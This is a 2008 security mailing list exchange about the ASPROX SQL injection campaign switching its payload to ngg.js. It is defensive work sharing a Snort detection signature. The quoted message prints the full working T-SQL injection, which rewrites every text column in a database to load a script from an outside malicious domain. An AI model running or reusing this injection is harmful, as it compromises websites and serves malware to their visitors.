[Emerging-Sigs] Another ASPROX Snort rule
Matt Jonkman
jonkman at jonkmans.com
Mon Jul 7 12:30:04 EDT 2008
Thanks Greg. I think this url is safer to sig than the old /b.js.
Posting your sig now.
Matt
Greg Martin wrote:
> ASPROX payload morphed
>
> New domains found and new javascript payload "ngg.js" replaced the
> previous "b.js" starting just a couple of days ago. And it doesn't
> seem to be wasting any time:
> http://www.google.com/search?q=ngg.js Results 1 - 10 of about
> 19,300 for ngg.js. (0.03 seconds)
>
> DECLARE @T VARCHAR(255), at C VARCHAR(255) DECLARE Table_Cursor CURSOR
> FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE
> a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231
> OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO
> @T, at C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+ at T+'] SET ['+ at C
> +']=RTRIM(CONVERT(VARCHAR(4000),['+ at C+']))+''script src=http://www.apidad.com/ngg.js
> /script''') FETCH NEXT FROM Table_Cursor INTO @T, at C END CLOSE
> Table_Cursor DEALLOCATE Table_Cursor
>
> Snort signature to detect access of infected site:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX
> Infected Site - ngg.js Request"; flow:established,to_server;
> uricontent:"/ngg.js"; classtype:trojan-activity;
> reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)
>
> -G
>
> Greg Martin
> Director InfoSecurity
> Econet Inc. - Sentinel IPS
> 972.991.5005 x102
> http://infosec20.blogspot.com
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc
More information about the Emerging-sigs
mailing list